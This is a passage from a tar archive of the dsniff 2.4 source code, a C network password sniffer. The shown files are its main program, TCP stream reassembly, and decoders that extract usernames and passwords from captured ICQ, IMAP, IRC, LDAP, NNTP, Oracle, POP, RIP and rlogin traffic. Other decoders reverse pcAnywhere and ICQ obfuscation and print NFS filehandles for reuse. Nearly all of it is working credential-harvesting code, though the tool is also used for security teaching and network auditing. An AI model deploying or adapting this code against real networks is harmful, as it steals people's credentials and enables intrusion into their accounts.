0x5E, 0x54, 0x5D, 0x4E, 0x4C, 0x39, 0x50, 0x5F, 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x43, 0x69, 0x48, 0x33, 0x51, 0x54, 0x5D, 0x6E, 0x3C, 0x31, 0x64, 0x35, 0x5A, 0x00, 0x00 }; int decode_icq(u_char *buf, int len, u_char *obuf, int olen) { struct buf inbuf, outbuf; u_short version, cmd; u_int32_t uin; u_char *p; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); if (buf_get(&inbuf, &version, sizeof(version)) != sizeof(version)) return (0); version = pletohs(&version); switch (version) { case 2: if (buf_seek(&inbuf, ICQ2_CMD_OFFSET, SEEK_SET) < 0) return (0); if (buf_get(&inbuf, &cmd, sizeof(cmd)) != sizeof(cmd)) return (0); if ((cmd = pletohs(&cmd)) != 1000) return (0); if (buf_seek(&inbuf, ICQ2_UIN_OFFSET, SEEK_SET) < 0) return (0); if (buf_get(&inbuf, &uin, sizeof(uin)) != sizeof(uin)) return (0); uin = pletohl(&uin); if (buf_seek(&inbuf, ICQ2_PASS_OFFSET, SEEK_SET) < 0) return (0); break; case 5: { u_int32_t a1, a2, a3, a4, a5, c, key, i, k; if (buf_seek(&inbuf, ICQ5_CKSUM_OFFSET, SEEK_SET) < 0) return (0); if (buf_get(&inbuf, &c, sizeof(c)) != sizeof(c)) return (0); c = pletohl(&c); a1 = c & 0x0001f000; a1 = a1 >> 0x0c; a2 = c & 0x07c007c0; a2 = a2 >> 0x01; a3 = c & 0x003e0001; a3 = a3 << 0x0a; a4 = c & 0xf8000000; a4 = a4 >> 0x10; a5 = c & 0x0000083e; a5 = a5 << 0x0f; key = len * 0x68656C6C; key += a1 + a2 + a3 + a4 + a5; p = inbuf.base; for (i = 0x0a; i < inbuf.end + 3; i += 4) { k = key + icq5_table[i & 0xff]; if (i != 0x16) { p[i] ^= (u_char)(k & 0xff); p[i + 1] ^= (u_char)((k & 0xff00) >> 8); } if (i != 0x12) { p[i + 2] ^= (u_char)((k & 0xff0000) >> 16); p[i + 3] ^= (u_char)((k & 0xff000000) >> 24); } } if (buf_seek(&inbuf, ICQ5_CMD_OFFSET, SEEK_SET) < 0) return (0); if (buf_get(&inbuf, &cmd, sizeof(cmd)) != sizeof(cmd)) return (0); if ((cmd = pletohs(&cmd)) != 1000) return (0); if (buf_seek(&inbuf, ICQ5_UIN_OFFSET, SEEK_SET) < 0) return (0); if (buf_get(&inbuf, &uin, sizeof(uin)) != sizeof(uin)) return (0); uin = pletohl(&uin); if (buf_seek(&inbuf, ICQ5_PASS_OFFSET, SEEK_SET) < 0) return (0); } break; default: return (0); } buf_putf(&outbuf, "%d\n%.*s\n", uin, buf_len(&inbuf), buf_ptr(&inbuf)); buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/config.h.in0000600000175000017500000000533607210773536014532 0ustar lucianoluciano/* config.h.in. Generated automatically from configure.in by autoheader. */ /* Define to empty if the keyword does not work. */ #undef const /* Define if you have the strftime function. */ #undef HAVE_STRFTIME /* Define as the return type of signal handlers (int or void). */ #undef RETSIGTYPE /* Define to `unsigned' if doesn't define. */ #undef size_t /* Define if you have the ANSI C header files. */ #undef STDC_HEADERS /* Define if your declares struct tm. */ #undef TM_IN_SYS_TIME /* Define if the X Window System is missing or not being used. */ #undef X_DISPLAY_MISSING /* Define to 'uint32_t' if doesn't define. */ #undef u_int32_t /* Define to 'uint64_t' if doesn't define. */ #undef u_int64_t /* Define to 'u_int32_t' if doesn't define. */ #undef in_addr_t /* Define if you have the header file. */ #undef HAVE_DB_H /* Define if you have the header file. */ #undef HAVE_DB_185_H /* Should be in , *sigh* */ #undef HAVE_MINMAX #ifndef HAVE_MINMAX #define MIN(a,b) (((a)<(b))?(a):(b)) #define MAX(a,b) (((a)>(b))?(a):(b)) #endif /* Define if you have the MD5Update function. */ #undef HAVE_MD5UPDATE /* Define if you have the dirname function. */ #undef HAVE_DIRNAME /* Define if you have the ether_ntoa function. */ #undef HAVE_ETHER_NTOA /* Define if you have the gethostname function. */ #undef HAVE_GETHOSTNAME /* Define if you have the socket function. */ #undef HAVE_SOCKET /* Define if you have the strdup function. */ #undef HAVE_STRDUP /* Define if you have the strlcat function. */ #undef HAVE_STRLCAT /* Define if you have the strlcpy function. */ #undef HAVE_STRLCPY /* Define if you have the strsep function. */ #undef HAVE_STRSEP /* Define if you have the strstr function. */ #undef HAVE_STRSTR /* Define if you have the warnx function. */ #undef HAVE_WARNX /* Define if you have the header file. */ #undef HAVE_ERR_H /* Define if you have the header file. */ #undef HAVE_FCNTL_H /* Define if you have the header file. */ #undef HAVE_LIBGEN_H /* Define if you have the header file. */ #undef HAVE_NET_IF_TUN_H /* Define if you have the header file. */ #undef HAVE_SYS_IOCTL_H /* Define if you have the header file. */ #undef HAVE_SYS_QUEUE_H /* Define if you have the header file. */ #undef HAVE_UNISTD_H /* Define if you have the nsl library (-lnsl). */ #undef HAVE_LIBNSL /* Define if you have the resolv library (-lresolv). */ #undef HAVE_LIBRESOLV /* Define if you have the rpcsvc library (-lrpcsvc). */ #undef HAVE_LIBRPCSVC /* Define if you have the socket library (-lsocket). */ #undef HAVE_LIBSOCKET dsniff-2.4/dsniff.c0000600000175000017500000000617707254077077014135 0ustar lucianoluciano/* * dsniff.c * * Password sniffer, because DrHoney wanted one. * * This is intended for demonstration purposes and educational use only. * * Copyright (c) 2000 Dug Song * * $Id: dsniff.c,v 1.69 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include "options.h" #include "pathnames.h" #include "pcaputil.h" #include "trigger.h" #include "record.h" #include "version.h" #define MAX_LINES 6 #define MIN_SNAPLEN 1024 int Opt_client = 0; int Opt_debug = 0; u_short Opt_dns = 1; int Opt_magic = 0; int Opt_read = 0; int Opt_write = 0; int Opt_snaplen = MIN_SNAPLEN; int Opt_lines = MAX_LINES; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: dsniff [-cdmn] [-i interface] [-s snaplen] [-f services]\n" " [-t trigger[,...]] [-r|-w savefile] [expression]\n"); exit(1); } static void sig_hup(int sig) { trigger_dump(); } static void sig_die(int sig) { record_close(); exit(0); } static void null_syslog(int type, int errnum, struct ip *iph, void *data) { } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; char *services, *savefile, *triggers; int c; services = savefile = triggers = NULL; while ((c = getopt(argc, argv, "cdf:i:mnr:s:t:w:h?V")) != -1) { switch (c) { case 'c': Opt_client = 1; break; case 'd': Opt_debug++; break; case 'f': services = optarg; break; case 'i': nids_params.device = optarg; break; case 'm': Opt_magic = 1; break; case 'n': Opt_dns = 0; break; case 'r': Opt_read = 1; savefile = optarg; break; case 's': if ((Opt_snaplen = atoi(optarg)) == 0) usage(); break; case 't': triggers = optarg; break; case 'w': Opt_write = 1; savefile = optarg; break; default: usage(); } } argc -= optind; argv += optind; if (Opt_read && Opt_write) usage(); if (!record_init(savefile)) err(1, "record_init"); signal(SIGHUP, sig_hup); signal(SIGINT, sig_die); signal(SIGTERM, sig_die); if (Opt_read) { record_dump(); record_close(); exit(0); } if (argc != 0) nids_params.pcap_filter = copy_argv(argv); nids_params.scan_num_hosts = 0; nids_params.syslog = null_syslog; if (!nids_init()) { record_close(); errx(1, "nids_init: %s", nids_errbuf); } if (Opt_magic) { trigger_init_magic(DSNIFF_LIBDIR DSNIFF_MAGIC); } if (triggers) { trigger_init_list(triggers); } if (services == NULL) { services = DSNIFF_LIBDIR DSNIFF_SERVICES; } trigger_init_services(services); nids_register_ip(trigger_ip); nids_register_ip(trigger_udp); if (Opt_client) { nids_register_ip(trigger_tcp_raw); signal(SIGALRM, trigger_tcp_raw_timeout); alarm(TRIGGER_TCP_RAW_TIMEOUT); } else nids_register_tcp(trigger_tcp); if (nids_params.pcap_filter != NULL) { warnx("listening on %s [%s]", nids_params.device, nids_params.pcap_filter); } else warnx("listening on %s", nids_params.device); nids_run(); /* NOTREACHED */ exit(0); } dsniff-2.4/decode_imap.c0000600000175000017500000000150207254077074015075 0ustar lucianoluciano/* * decode_imap.c * * Internet Mail Access Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_imap.c,v 1.5 2001/03/15 08:33:00 dugsong Exp $ */ #include "config.h" #include #include #include #include "decode.h" #include "buf.h" int decode_imap(u_char *buf, int len, u_char *obuf, int olen) { struct buf *line, inbuf, outbuf; int i; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); while ((i = buf_index(&inbuf, "\r\n", 2)) != -1) { line = buf_tok(&inbuf, NULL, i); buf_skip(&inbuf, 2); if ((i = buf_index(line, " ", 1)) != -1) { buf_skip(line, i + 1); if (buf_cmp(line, "LOGIN ", 6) == 0) { buf_putf(&outbuf, "%.*s\n", buf_len(line), buf_ptr(line)); } } } buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/decode_irc.c0000600000175000017500000000316107254077075014730 0ustar lucianoluciano/* * decode_irc.c * * Internet Relay Chat. * * Copyright (c) 2000 Dug Song * * $Id: decode_irc.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "decode.h" int decode_irc(u_char *buf, int len, u_char *obuf, int olen) { struct buf *line, inbuf, outbuf; int i, got_auth; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); got_auth = 0; while ((i = buf_index(&inbuf, "\n", 1)) != -1) { line = buf_tok(&inbuf, NULL, i); buf_skip(&inbuf, 1); if (i > 0 && line->base[i - 1] == '\r') line->end--; line->base[line->end] = '\0'; if (buf_cmp(&inbuf, ";", 1) == 0) { if ((i = buf_index(line, " ", 1)) < 0) continue; buf_skip(line, i + 1); } if (buf_cmp(line, "USER ", 5) == 0 || buf_cmp(line, "NICK ", 5) == 0) { buf_rewind(line); buf_putf(&outbuf, "%s\n", buf_ptr(line)); } else if (buf_cmp(line, "PASS ", 5) == 0 || buf_cmp(line, "OPER ", 5) == 0) { buf_rewind(line); buf_putf(&outbuf, "%s\n", buf_ptr(line)); got_auth = 1; } else if (buf_cmp(line, "MODE ", 5) == 0 && buf_index(line, " +k ", 4) != -1) { buf_rewind(line); buf_putf(&outbuf, "%s\n", buf_ptr(line)); got_auth = 1; } else if (buf_cmp(line, "JOIN ", 5) == 0) { buf_skip(line, 5); if ((i = buf_index(line, " ", 1)) < 0) continue; buf_skip(line, i + 1); if (buf_len(line) < 1) continue; buf_rewind(line); buf_putf(&outbuf, "%s\n", buf_ptr(line)); got_auth = 1; } } buf_end(&outbuf); return (got_auth ? buf_len(&outbuf) : 0); } dsniff-2.4/decode_ldap.c0000600000175000017500000000330207254077075015070 0ustar lucianoluciano/* * decode_ldap.c * * Lightweight Directory Access Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_ldap.c,v 1.5 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "asn1.h" #include "decode.h" int decode_ldap(u_char *buf, int len, u_char *obuf, int olen) { struct buf *msg, inbuf, outbuf; int i, type; u_char *p; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); while (buf_len(&inbuf) > 10) { /* LDAPMessage */ type = asn1_type(&inbuf); i = asn1_len(&inbuf); if (i <= 0 || (msg = buf_tok(&inbuf, NULL, i)) == NULL) break; if (type != ASN1_SEQUENCE) continue; /* messageID */ type = asn1_type(msg); i = asn1_len(msg); if (type != ASN1_INTEGER || i <= 0 || buf_skip(msg, i) < 0) continue; /* bindRequest op - APPLICATION[0] SEQUENCE */ if (buf_cmp(msg, "\x60", 1) != 0) continue; asn1_type(msg); asn1_len(msg); /* version */ type = asn1_type(msg); i = asn1_len(msg); if (type != ASN1_INTEGER || i <= 0 || buf_skip(msg, i) < 0) continue; /* name */ type = asn1_type(msg); i = asn1_len(msg); p = buf_ptr(msg); if (type != ASN1_STRING || i <= 0 || buf_skip(msg, i) < 0) continue; /* simple auth [0] */ if (buf_cmp(msg, "\x80", 1) != 0) continue; *(buf_ptr(msg)) = '\0'; buf_skip(msg, 1); /* passwd */ i = asn1_len(msg); if (i <= 0 || i > buf_len(msg)) continue; if (buf_tell(&outbuf) > 0) buf_put(&outbuf, "\n", 1); buf_putf(&outbuf, "%s\n", p); buf_put(&outbuf, buf_ptr(msg), i); buf_put(&outbuf, "\n", 1); } buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/tcp_raw.c0000600000175000017500000001141607254077100014276 0ustar lucianoluciano/* * tcp_raw.c * * Copyright (c) 2000 Dug Song * * $Id: tcp_raw.c,v 1.10 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include "options.h" #include "tcp_raw.h" struct tha { in_addr_t src; in_addr_t dst; u_short port; }; struct tcp_seg { u_int32_t seq; u_char *data; int len; }; struct tcp_conn { struct tha tha; time_t mtime; struct tcp_seg *seg; int segcnt; int segmax; struct tcp_conn *next; }; #define TCP_TIMEOUT 60 #define TCP_HASHSIZE 919 static struct tcp_conn conntab[TCP_HASHSIZE]; static int tcp_seg_compare(const void *a, const void *b) { struct tcp_seg *sa, *sb; sa = (struct tcp_seg *) a; sb = (struct tcp_seg *) b; if (sa->seq < sb->seq) return (-1); else if (sa->seq > sb->seq) return (1); else return (0); } static void tcp_raw_delete(struct tcp_conn *conn) { struct tcp_conn *hold; int i; if (conn->next != NULL) { for (i = 0; i < conn->segcnt; i++) { if (conn->seg[i].data) free(conn->seg[i].data); } free(conn->seg); conn->seg = NULL; conn->segcnt = conn->segmax = 0; if (conn->next->next != NULL) { hold = conn->next; *conn = *conn->next; free(hold); } else { free(conn->next); conn->next = NULL; } } } static struct iovec * tcp_raw_reassemble(struct tcp_conn *conn, int minlen) { struct iovec *iov; int i, len; len = 0; for (i = 0; i < conn->segcnt; i++) len += conn->seg[i].len; if (len < minlen) return (NULL); if ((iov = (struct iovec *) malloc(sizeof(*iov))) == NULL) err(1, "tcp_raw_reassemble: malloc"); if ((iov->iov_base = (u_char *) malloc(len)) == NULL) err(1, "tcp_raw_reassemble: malloc"); iov->iov_len = 0; qsort(conn->seg, conn->segcnt, sizeof(*conn->seg), tcp_seg_compare); for (i = 0; i < conn->segcnt; i++) { len = conn->seg[i].len; memcpy(iov->iov_base + iov->iov_len, conn->seg[i].data, len); iov->iov_len += len; } return (iov); } struct iovec * tcp_raw_input(struct libnet_ip_hdr *ip, struct libnet_tcp_hdr *tcp, int len) { struct tha tha; struct tcp_conn *conn; struct tcp_seg seg; struct iovec *iov; u_short cksum; u_char *buf; int tcp_hl = tcp->th_off * 4; /* Verify TCP checksum. */ cksum = tcp->th_sum; libnet_do_checksum((u_char *) ip, IPPROTO_TCP, len); if (cksum != tcp->th_sum) return (NULL); tha.src = ip->ip_src.s_addr; tha.dst = ip->ip_dst.s_addr; tha.port = ntohs(tcp->th_sport) << 16 | ntohs(tcp->th_dport); buf = (u_char *)tcp + tcp_hl; len -= tcp_hl; iov = NULL; /* Find half-duplex stream associated with this segment. */ for (conn = &conntab[tha.port % TCP_HASHSIZE]; conn->next != NULL; conn = conn->next) { if (memcmp((char *)&tha, (char *)&conn->tha, sizeof(tha)) == 0) break; } /* Process by TCP flags. */ if (conn->next == NULL) { if (tcp->th_flags & TH_SYN) { if (conn->next == NULL && (conn->next = (struct tcp_conn *) calloc(1, sizeof(*conn))) == NULL) { err(1, "tcp_raw_input: calloc"); } conn->tha = tha; if (conn->seg == NULL && (conn->seg = (struct tcp_seg *) malloc(sizeof(seg) * 128)) == NULL) { err(1, "tcp_raw_input: malloc"); } conn->segmax = 128; } } else if (tcp->th_flags & TH_FIN || tcp->th_flags & TH_RST) { iov = tcp_raw_reassemble(conn, 1); } else if (tcp->th_flags & TH_ACK && len > 0) { seg.seq = ntohl(tcp->th_seq); if (bsearch(&seg, conn->seg, conn->segcnt, sizeof(seg), tcp_seg_compare) == NULL) { if ((seg.data = (u_char *) malloc(len)) == NULL) err(1, "tcp_raw_input: malloc"); memcpy(seg.data, buf, len); seg.len = len; if (conn->segcnt == conn->segmax) { if ((conn->seg = (struct tcp_seg *) realloc(conn->seg, (conn->segmax * 2) * sizeof(seg))) == NULL) err(1, "tcp_raw_input: realloc"); conn->segmax *= 2; } conn->seg[conn->segcnt++] = seg; iov = tcp_raw_reassemble(conn, Opt_snaplen); } } conn->mtime = time(NULL); /* If we successfully reassembled the stream, delete its entry. */ if (iov != NULL) { tcp_raw_delete(conn); } return (iov); } void tcp_raw_timeout(int timeout, tcp_raw_callback_t callback) { struct tcp_conn *conn; struct iovec *iov; time_t now; int i; now = time(NULL); for (i = 0; i < TCP_HASHSIZE; i++) { for (conn = &conntab[i]; conn != NULL && conn->next != NULL; conn = conn->next) { if (now - conn->mtime > timeout) { iov = tcp_raw_reassemble(conn, 1); if (iov != NULL) { callback(conn->tha.src, conn->tha.dst, conn->tha.port >> 16, conn->tha.port & 0xffff, iov->iov_base, iov->iov_len); free(iov->iov_base); free(iov); } tcp_raw_delete(conn); } } } } dsniff-2.4/decode_mountd.c0000600000175000017500000000340707254077075015464 0ustar lucianoluciano/* * decode_mountd.c * * RPC mountd. * * Outputs filehandle in nfsshell format. :-) * * Copyright (c) 2000 Dug Song * * $Id: decode_mountd.c,v 1.7 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include "buf.h" #include "mount.h" #include "rpc.h" #include "decode.h" int decode_mountd(u_char *buf, int len, u_char *obuf, int olen) { XDR xdrs; struct buf outbuf; struct rpc_msg msg; struct xid_map *xm; struct fhstatus fhstat; char *p, *dir; int i, hdrlen; buf_init(&outbuf, obuf, olen); if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) return (0); if (msg.rm_direction == CALL && msg.rm_call.cb_prog == MOUNTPROG && msg.rm_call.cb_proc == MOUNTPROC_MNT) { xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); dir = NULL; if (xdr_string(&xdrs, &dir, MAXPATHLEN)) { xid_map_enter(msg.rm_xid, MOUNTPROG, MOUNTVERS, MOUNTPROC_MNT, (void *) dir); } xdr_destroy(&xdrs); } else if (msg.rm_direction == REPLY && (xm = xid_map_find(msg.rm_xid)) != NULL) { if (msg.rm_reply.rp_stat == MSG_ACCEPTED && msg.acpted_rply.ar_stat == SUCCESS) { xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); if (xdr_fhstatus(&xdrs, &fhstat)) { if (fhstat.fhs_status == 0) { buf_putf(&outbuf, "%s [", (char *)xm->data); p = fhstat.fhstatus_u.fhs_fhandle; for (i = 0; i < FHSIZE; i++) { buf_putf(&outbuf, "%.2x ", p[i] & 0xff); } buf_put(&outbuf, "]\n", 2); } } xdr_destroy(&xdrs); } free(xm->data); memset(xm, 0, sizeof(*xm)); } buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/decode_napster.c0000600000175000017500000000147707254077075015637 0ustar lucianoluciano/* * decode_napster.c * * Napster. w00w00! * * Copyright (c) 2000 Dug Song * * $Id: decode_napster.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "decode.h" int decode_napster(u_char *buf, int len, u_char *obuf, int olen) { struct buf inbuf, outbuf; u_short i, type; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); if (buf_get(&inbuf, &i, sizeof(i)) != sizeof(i)) return (0); i = pletohs(&i); if (buf_get(&inbuf, &type, sizeof(type)) != sizeof(type)) return (0); type = pletohs(&type); if (type != 2 || i > buf_len(&inbuf)) return (0); buf_put(&outbuf, buf_ptr(&inbuf), i); buf_put(&outbuf, "\n", 1); buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/decode_nntp.c0000600000175000017500000000225307254077075015133 0ustar lucianoluciano/* * decode_nntp.c * * Network News Transport Protocol. * * Copyright (c) 2000 Felix von Leitner * Copyright (c) 2000 Dug Song * * $Id: decode_nntp.c,v 1.5 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include "base64.h" #include "decode.h" int decode_nntp(u_char *buf, int len, u_char *obuf, int olen) { char *p; int i, simple, dpa; obuf[0] = '\0'; simple = dpa = 0; for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { if (simple == 1) { strlcat(obuf, p, olen); strlcat(obuf, "\n", olen); simple = 0; } else if (strncasecmp(p, "AUTHINFO ", 9) == 0) { strlcat(obuf, p, olen); if (strncasecmp(p + 9, "SIMPLE", 6) == 0) { simple = 1; } else if (strncasecmp(p + 9, "GENERIC ", 8) == 0) { if (strncasecmp(p + 17, "DPA", 3) == 0) { dpa = 1; } else if (dpa == 1) { p += 17; i = base64_pton(p, p, strlen(p)); p[i] = '\0'; i = strlen(obuf); snprintf(obuf + i, olen - i, " [%s]", p); } } strlcat(obuf, "\n", olen); } } return (strlen(obuf)); } dsniff-2.4/decode_oracle.c0000600000175000017500000000264007254077075015421 0ustar lucianoluciano/* * decode_oracle.c * * Oracle SQL*Net v2/Net8. * * Copyright (c) 2000 Dug Song * * $Id: decode_oracle.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include "decode.h" /* XXX - dag nasty. anyone have protocol specs? */ int decode_oracle(u_char *buf, int len, u_char *obuf, int olen) { u_char *p, *q; u_short i, j; int gotauth = 0; p = buf; i = pntohs(p); if (i >= len) return (0); if (i < 60) { /* XXX - skip unknown "empty" packet */ p += i; i = pntohs(p); if (p + i > buf + len) return (0); } /* Save TNS connect string. */ p[i] = '\0'; for (q = p + i; q > p && q[-1] != '\0'; q--) ; snprintf(obuf, olen, "%s\n", q); p += i; /* XXX - skip initial username message. */ if ((p = bufbuf(p, len, "(TNS V", 6)) == NULL) return (0); if ((i = len - (p - buf)) <= 0) return (0); if ((p = memchr(p, ')', i)) == NULL) return (0); /* Parse auth messages. */ for (p++; p - buf < len; p += i) { i = pntohs(p); if (p + i > buf + len || i < 120) break; if (memcmp(p + 4, "\x06\x00\x00\x00\x00\x00\x03\x3a", 8) != 0) continue; for (q = p + i; q > p && q[-1] != '\0'; q--) ; j = pntohs(p + 19); if (q + j > buf + len) return (0); q[j] = '\0'; j = strlen(obuf); snprintf(obuf + j, olen + j, "%s\n", p + 117); gotauth++; } return (gotauth ? strlen(obuf) : 0); } dsniff-2.4/decode_ospf.c0000600000175000017500000000075607254077075015131 0ustar lucianoluciano/* * decode_ospf.c * * Open Shortest Path First. * * Copyright (c) 2000 Dug Song * * $Id: decode_ospf.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include "decode.h" int decode_ospf(u_char *buf, int len, u_char *obuf, int olen) { if (len < 25) return (0); if (pntohs(buf + 14) != 1) return (0); buf[24] = '\0'; return (snprintf(obuf, olen, "%s\n", buf + 16)); } dsniff-2.4/decode_pcanywhere.c0000600000175000017500000000321307254077075016316 0ustar lucianoluciano/* * decode_pcanywhere.c * * Symantec pcAnywhere. * * Thanks to Pascal Longpre for his BUGTRAQ post * on pcAnywhere encryption, and for providing me with traffic traces. * * Copyright (c) 2000 Dug Song * * $Id: decode_pcanywhere.c,v 1.7 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "decode.h" int decode_pcanywhere(u_char *buf, int len, u_char *obuf, int olen) { struct buf *word, inbuf, outbuf; u_char *p, c; int i; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); /* Skip leading zero bytes. */ while (buf_get(&inbuf, &c, 1) == 1) { if (c != 0) break; } /* Version 7, no encryption */ if (c < 0x0f && c != 0x06 /* jic */) { while ((word = buf_tok(&inbuf, "\r", 1)) != NULL) { if (buf_ptr(word)[0] == 0x6f) break; buf_putf(&outbuf, "%.*s\n", buf_len(word), buf_ptr(word)); } } /* Version 9, encrypted */ else { /* Skip optional \x6f command packets. */ while ((i = buf_index(&inbuf, "\x06", 1)) >= 0) { buf_skip(&inbuf, i); if (buf_len(&inbuf) > 2 && buf_ptr(&inbuf)[1] != 0xff) break; buf_skip(&inbuf, 2); } /* Parse \x06 auth packets. */ while (buf_cmp(&inbuf, "\x06", 1) == 0) { buf_skip(&inbuf, 1); if (buf_get(&inbuf, &c, 1) != 1) break; if (buf_len(&inbuf) < c) break; p = buf_ptr(&inbuf); buf_skip(&inbuf, c); for (i = c - 1; i > 0; i--) { p[i] = p[i - 1] ^ p[i] ^ (i - 1); } p[0] ^= 0xab; buf_putf(&outbuf, "%.*s\n", c, p); } } buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/decode_pop.c0000600000175000017500000000311707254077076014753 0ustar lucianoluciano/* * decode_pop.c * * Post Office Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_pop.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include "base64.h" #include "options.h" #include "decode.h" int decode_poppass(u_char *buf, int len, u_char *obuf, int olen) { char *p; obuf[0] = '\0'; for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { if (strncasecmp(p, "user ", 5) == 0 || strncasecmp(p, "pass ", 5) == 0 || strncasecmp(p, "newpass ", 8) == 0) { strlcat(obuf, p, olen); strlcat(obuf, "\n", olen); } } if (strip_lines(obuf, Opt_lines) < 3) return (0); return (strlen(obuf)); } int decode_pop(u_char *buf, int len, u_char *obuf, int olen) { char *p; int i, j; obuf[0] = '\0'; for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { if (strncasecmp(p, "AUTH PLAIN", 10) == 0 || strncasecmp(p, "AUTH LOGIN", 10) == 0) { strlcat(obuf, p, olen); strlcat(obuf, "\n", olen); /* Decode SASL auth. */ for (i = 0; i < 2 && (p = strtok(NULL, "\r\n")); i++) { strlcat(obuf, p, olen); j = base64_pton(p, p, strlen(p)); p[j] = '\0'; strlcat(obuf, " [", olen); strlcat(obuf, p, olen); strlcat(obuf, "]\n", olen); } } /* Save regular POP2, POP3 auth info. */ else if (strncasecmp(p, "USER ", 5) == 0 || strncasecmp(p, "PASS ", 5) == 0 || strncasecmp(p, "HELO ", 5) == 0) { strlcat(obuf, p, olen); strlcat(obuf, "\n", olen); } } return (strlen(obuf)); } dsniff-2.4/decode_portmap.c0000600000175000017500000000306707254077076015643 0ustar lucianoluciano/* * decode_portmap.c * * RPC portmap. * * Copyright (c) 2000 Dug Song * * $Id: decode_portmap.c,v 1.8 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include "rpc.h" #include "trigger.h" #include "decode.h" int decode_portmap(u_char *buf, int len, u_char *obuf, int olen) { XDR xdrs; struct rpc_msg msg; struct pmap *pm, pmap; struct xid_map *xm; int hdrlen; if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) return (0); if (msg.rm_direction == CALL && msg.rm_call.cb_prog == PMAPPROG && msg.rm_call.cb_proc == PMAPPROC_GETPORT) { xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); if (xdr_pmap(&xdrs, &pmap)) { if ((pm = malloc(sizeof(*pm))) != NULL) { *pm = pmap; xid_map_enter(msg.rm_xid, PMAPPROG, PMAPVERS, PMAPPROC_GETPORT, (void *) pm); } } xdr_destroy(&xdrs); } else if (msg.rm_direction == REPLY && (xm = xid_map_find(msg.rm_xid)) != NULL) { if (msg.rm_reply.rp_stat == MSG_ACCEPTED && msg.acpted_rply.ar_stat == SUCCESS) { pm = (struct pmap *)xm->data; xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); if (xdr_u_long(&xdrs, &pm->pm_port)) { trigger_rpc(pm->pm_prog, pm->pm_prot, pm->pm_port); trigger_rpc(pm->pm_prog, pm->pm_prot, 0 - (int) pm->pm_port); } xdr_destroy(&xdrs); } free(xm->data); memset(xm, 0, sizeof(*xm)); } return (0); } dsniff-2.4/decode_rip.c0000600000175000017500000000110707254077076014744 0ustar lucianoluciano/* * decode_rip.c * * Routing Information Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_rip.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include "decode.h" int decode_rip(u_char *buf, int len, u_char *obuf, int olen) { if (len < 21) return (0); /* Version 2 simple password authentication. */ if (buf[1] != 2 || memcmp(buf + 4, "\xff\xff\x00\x02", 4) != 0) return (0); buf[20] = '\0'; return (snprintf(obuf, olen, "%s\n", buf + 20)); } dsniff-2.4/decode_rlogin.c0000600000175000017500000000205107254077076015443 0ustar lucianoluciano/* * decode_rlogin.c * * Berkeley remote login/shell/exec. * * Copyright (c) 2000 Dug Song * * $Id: decode_rlogin.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include "options.h" #include "decode.h" int decode_rlogin(u_char *buf, int len, u_char *obuf, int olen) { u_char *p, *q; /* Skip first NULL, or rexec stderr port */ for (p = buf; p - buf < len && *p == '\0'; p++) ; /* VOID */ strlcpy(obuf, "[", olen); strlcat(obuf, p, olen); /* Local username */ strlcat(obuf, ":", olen); p += strlen(p) + 1; strlcat(obuf, p, olen); /* Remote username */ strlcat(obuf, "]\n", olen); p += strlen(p) + 1; p += strlen(p) + 1; /* Skip term info */ if ((q = strstr(p, "\xff\xffss")) != NULL) /* Skip window size */ p += 12; for (p = strtok(p, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { strlcat(obuf, p, olen); strlcat(obuf, "\n", olen); } if (!strip_lines(obuf, Opt_lines)) return (0); return (strlen(obuf)); } dsniff-2.4/decode_smb.c0000600000175000017500000000336007254077076014736 0ustar lucianoluciano/* * decode_smb.c * * Microsoft Server Message Block. * * Copyright (c) 2000 